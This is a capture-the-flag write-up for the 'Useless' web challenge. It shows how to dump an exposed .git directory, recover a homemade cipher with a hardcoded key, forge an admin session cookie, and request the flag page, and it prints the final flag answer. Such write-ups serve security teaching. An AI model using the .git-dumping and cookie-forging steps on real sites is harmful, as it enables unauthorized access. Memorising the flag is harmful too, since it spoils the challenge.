CTFtime.org

Useless

by kazkiti / PwnaSonic

Tags: misc web git 

Rating: 5.0

# ▼▼▼Useless - 89pts (Misc:42/170=24.7%)▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**

`http://13.124.66.179`

---

**1.Understanding of the function**

・Create Account

・Login

---

**2.Information Gathering**

403 Responce at /.git/

```
# perl rip-git.pl -v -u http://13.124.66.179/.git
[i] Downloading git files from http://13.124.66.179/.git
[i] Auto-detecting 404 as 200 with 3 requests
[i] Getting correct 404 responses
[i] Using session name: bjFqLEJf
[d] found COMMIT_EDITMSG
[d] found config
[d] found description
[d] found HEAD
[d] found index
[!] Not found for packed-refs: 404 Not Found
[!] Not found for objects/info/alternates: 404 Not Found
[!] Not found for info/grafts: 404 Not Found
[d] found logs/HEAD
[d] found objects/72/949062a18d1a23d392c87a1a6555cdddb83014
[d] found objects/ab/117952cf9db060c337dcb90e782171377eab0b
[d] found refs/heads/master
[i] Running git fsck to check for missing items
Checking object directories: 100% (256/256), done.
[i] Got items with git fsck: 0, Items fetched: 0
[!] No more items to fetch. That's it!
Your branch is based on 'origin/master', but the upstream is gone.
(use "git branch --unset-upstream" to fixup)
```

Get a file `readme.md`

---

`# git log`

```
commit ab117952cf9db060c337dcb90e782171377eab0b (HEAD -> master)
Author: joonuree <[email protected]>
Date: Thu Feb 1 20:09:25 2018 +0900

useless

commit 72949062a18d1a23d392c87a1a6555cdddb83014
Author: joonuree <[email protected]>
Date: Thu Feb 1 20:07:26 2018 +0900
```

Let's rollback 72949062a18d1a23d392c87a1a6555cdddb83014

`# git reset --hard 72949062a18d1a23d392c87a1a6555cdddb83014`

Get `readme.md` and ` enc.py`

---

`readme.md`

```
## algorithm for session cookie

### Basic
- general user >> username + user IP
- **admin** >> admin + 127.0.0.1

### example
- username : `codegate`, IP : `211.224.255.84`
- `codegate211.224.255.84` >> (encrypt) >> setting cookie
```

If I log in as admin and IP 127.0.0.1, I will get a flag.

---

` enc.py`

```
#-*- coding: utf-8 -*-

class Encrypt():

def __init__(self, iv=None, keystr=None):
self.iv = "useles5@"
self.keystr = "SUCK_7h15+4lG0_!"
self.init_matrix = []

chunk1 = self.keystr[0:8]
chunk2 = self.keystr[8:16]
row = []

for i in range(0, 8):
for j in range(0, 8):
row.append(ord(chunk1[i]) ^ ord(chunk2[j]))

self.init_matrix.append( row[0:8])

del row[:]


def split(self, p_txt):

chunk = []

if len(p_txt)%8 != 0:
p_txt += "x" * (8 - len(p_txt)%8)

for i in range(0, len(p_txt), 8 ):
chunk.append(p_txt[i:i+8])

return chunk


def change(self, p_txt):

temp = []
result = []

p_chunk = self.split(p_txt)

for i in range(0, len(p_chunk)):
for j in range(0, 8):
temp.append(ord(p_chunk[i][j]))

result.append(temp[0:8])
del temp[:]

return result

def schedule(self, num):

shift = [1, 2, 3, 2, 2, 1, 2, 3]
temp = []
matrix = []

if num%2 == 0:
for i in range(0, 8):
for j in range(0, 8):
temp.append(self.init_matrix[i][(8 - shift[i] + j)%8])

matrix.append(temp[0:8])
del temp[:]


else:
for i in range(0, 8):
for j in range(0, 8):
temp.append(self.init_matrix[i][(shift[i] + j)%8])

matrix.append(temp[0:8])
del temp[:]


return matrix

def round0(self, p_chunk, k_chunk):

temp = []

temp.append(p_chunk[0] - 10 + k_chunk[0])
temp.append(p_chunk[1] ^ k_chunk[1])
temp.append(p_chunk[2] + k_chunk[2])
temp.append(p_chunk[3] % (k_chunk[3]+2) + 32)
temp.append(p_chunk[4] * 2 - k_chunk[3] - 7)
temp.append(p_chunk[5] - 11 - k_chunk[5]%13)
temp.append(p_chunk[6] ^ k_chunk[6])
temp.append(p_chunk[7] * 5 / (k_chunk[7] + 5))

return temp

def round1(self, p_chunk, k_chunk):

temp = []

temp.append(p_chunk[0] - 11 + k_chunk[0])
temp.append(p_chunk[1] ^ (k_chunk[1])%5)
temp.append(p_chunk[2] ^ k_chunk[2])
temp.append(p_chunk[3] % (k_chunk[3]+2) + 34)
temp.append(p_chunk[4] - k_chunk[3] + 14)
temp.append(p_chunk[5] ^ k_chunk[5])
temp.append(p_chunk[6] + 9 - k_chunk[6])
temp.append(p_chunk[7] + k_chunk[7])

return temp

def round2(self, p_chunk, k_chunk):

temp = []

temp.append(p_chunk[0] - 11 + k_chunk[0])
temp.append(p_chunk[1] ^ (k_chunk[1]) % 13)
temp.append(p_chunk[2] + k_chunk[2] + 17)
temp.append(p_chunk[3] ^ k_chunk[3])
temp.append(p_chunk[4] ^ k_chunk[4])
temp.append(p_chunk[5] - k_chunk[5] + 20)
temp.append(p_chunk[6] / 3 % (k_chunk[6]+15))
temp.append(p_chunk[7] + k_chunk[7])

return temp

def round3(self, p_chunk, k_chunk):

temp = []

temp.append(p_chunk[0] + k_chunk[0])
temp.append(p_chunk[1] ^ k_chunk[1] - 15)
temp.append(p_chunk[2] ^ k_chunk[2])
temp.append(p_chunk[3] + k_chunk[3])
temp.append(p_chunk[4] + k_chunk[3] - 33)
temp.append(p_chunk[5] ^ k_chunk[5])
temp.append(p_chunk[6] + k_chunk[6] - 55)
temp.append(p_chunk[7] + k_chunk[7])

return temp

def round4(self, p_chunk, k_chunk):

temp = []

temp.append(p_chunk[0] + k_chunk[0])
temp.append(p_chunk[1] + k_chunk[1] + 17)
temp.append(p_chunk[2] ^ k_chunk[2])
temp.append(p_chunk[3] - k_chunk[3] + 20)
temp.append(p_chunk[4] % (k_chunk[3]+2) - 34)
temp.append(p_chunk[5] ^ k_chunk[5])
temp.append(p_chunk[6] + k_chunk[6])
temp.append(p_chunk[7] - 11 + k_chunk[7])

return temp

def round5(self, p_chunk, k_chunk):

temp = []

temp.append(p_chunk[0] / 6 % (k_chunk[0]+1))
temp.append(p_chunk[1] ^ k_chunk[1])
temp.append(p_chunk[2] - k_chunk[2] + 20)
temp.append(p_chunk[3] - k_chunk[3] + 20)
temp.append(p_chunk[4] % (k_chunk[3]+7) - 34)
temp.append(p_chunk[5] + k_chunk[5])
temp.append(p_chunk[6] ^ k_chunk[6])
temp.append(p_chunk[7] + k_chunk[7])

return temp

def round6(self, p_chunk, k_chunk):

temp = []

temp.append(p_chunk[0] / 6 % (k_chunk[0]+7))
temp.append(p_chunk[1] + k_chunk[1])
temp.append(p_chunk[2] ^ k_chunk[2])
temp.append(p_chunk[3] - k_chunk[3] % 2 + 55)
temp.append(p_chunk[4] % (k_chunk[3]+3) + 127)
temp.append(p_chunk[5] ^ k_chunk[5])
temp.append(p_chunk[6] + k_chunk[6] % 3)
temp.append(p_chunk[7] + 11 + k_chunk[7])

return temp

def round7(self, p_chunk, k_chunk):

temp = []

temp.append(p_chunk[0] + k_chunk[0]%30)
temp.append(p_chunk[1] / (k_chunk[1]+1))
temp.append(p_chunk[2] % (k_chunk[2]+4) + 18)
temp.append(p_chunk[3] ^ k_chunk[3])
temp.append(p_chunk[4] ^ k_chunk[4])
temp.append(p_chunk[5] / (k_chunk[5]+10) + 97)
temp.append(p_chunk[6] + k_chunk[6])
temp.append(p_chunk[7] / 11 + k_chunk[7])

return temp

def xor_calc(self, iv, chunk):

result = []

for i in range(0, 8):
result.append(iv[i] ^ chunk[i])

return result

def encblock(self, chunk, num):

rows = self.schedule(num)

block = []
result = []

block.append(self.round0(chunk, rows[0]))
block.append(self.round1(chunk, rows[1]))
block.append(self.round2(chunk, rows[2]))
block.append(self.round3(chunk, rows[3]))
block.append(self.round4(chunk, rows[4]))
block.append(self.round5(chunk, rows[5]))
block.append(self.round6(chunk, rows[6]))
block.append(self.round7(chunk, rows[7]))

if num%2 == 0:
result.append(chunk[0]^block[0][1]^block[1][2]^block[2][3])
result.append(chunk[1]^block[0][1]^block[1][2]^block[3][2])
result.append(chunk[2]^block[0][1]^block[2][3]^block[3][2])
result.append(chunk[3]^block[1][2]^block[2][3]^block[3][2])
result.append(chunk[4]^block[4][2]^block[5][1]^block[6][2])
result.append(chunk[5]^block[4][2]^block[5][1]^block[7][3])
result.append(chunk[6]^block[4][2]^block[6][2]^block[7][3])
result.append(chunk[7]^block[5][1]^block[6][2]^block[7][3])

else:
result.append(chunk[0]^block[0][6]^block[1][5]^block[2][4])
result.append(chunk[1]^block[0][6]^block[1][5]^block[3][5])
result.append(chunk[2]^block[0][6]^block[2][4]^block[3][5])
result.append(chunk[3]^block[1][5]^block[2][4]^block[3][5])
result.append(chunk[4]^block[4][5]^block[5][6]^block[6][5])
result.append(chunk[5]^block[4][5]^block[5][6]^block[7][4])
result.append(chunk[6]^block[4][5]^block[6][5]^block[7][4])
result.append(chunk[7]^block[5][6]^block[6][5]^block[7][4])

return result

def encrypt(self, plaintxt):

p_chunks = self.change(plaintxt)
e_chunks = []

for i in range(0, len(p_chunks)):
if i == 0:
xor = (self.change(self.iv)[0])

temp = self.xor_calc(xor, p_chunks[i])
e_chunks.append(self.encblock(temp, i))

del xor[:]
del temp[:]

xor.extend(e_chunks[i])

enctxt = ""

for i in range(0, len(e_chunks)):
for j in range(0, 8):
enctxt += chr(e_chunks[i][j])

return enctxt.encode('hex')
```

It is Encrypt Class file written in python.

---

At the end of enc.py, I wrote the following code.

```
e = Encrypt()
print e.encrypt('admin127.0.0.1')
```

```
# python enc.py
7e787c68293431367f6d63236f36694a
```

Get a useless_session_id of admin!!

---

```
GET / HTTP/1.1
Host: 13.124.66.179
Cookie: useless_session_id=7e787c68293431367f6d63236f36694a
```

↓ Response

```

  • admin

  • flag

    • ```

    ```
    GET /flag_6c98a6487611dd8d3adfa25d7f41cfed HTTP/1.1
    Host: 13.124.66.179
    Cookie: useless_session_id=7e787c68293431367f6d63236f36694a
    ```

    ```
    <div class="jumbo">
    <h2>FLAG</h2>
    <h4>Suck Algorithm! It has duplicated keys, So Useless :p</h4>
    <h4>Encrypt the below plain text in { } with key, and Auth IT!</h4>
    <h3>ENCRYPTME{It's_reaLLy_n0nsen5_th4t_I_5p3nt_M0ney_more_7h4n_My_6udg3t.}</h3>
    <h4>Thank you for solving, please enjoy other challenges! :)</h4>
    </div>
    ```

    ENCRYPTME{It's_reaLLy_n0nsen5_th4t_I_5p3nt_M0ney_more_7h4n_My_6udg3t.}

    ---

    At the end of enc.py, I wrote the following code.

    ```
    e = Encrypt()
    print e.encrypt("It's_reaLLy_n0nsen5_th4t_I_5p3nt_M0ney_more_7h4n_My_6udg3t.")
    ```

    ```
    # python enc.py
    1678766808377c204d4a062d550c536f3d783868306d262550154b6129702f485378396821494c52171e695d4f16493c79783f681f4e1c411b045e0b227b2443
    ```

    Get a flag!!

    Comments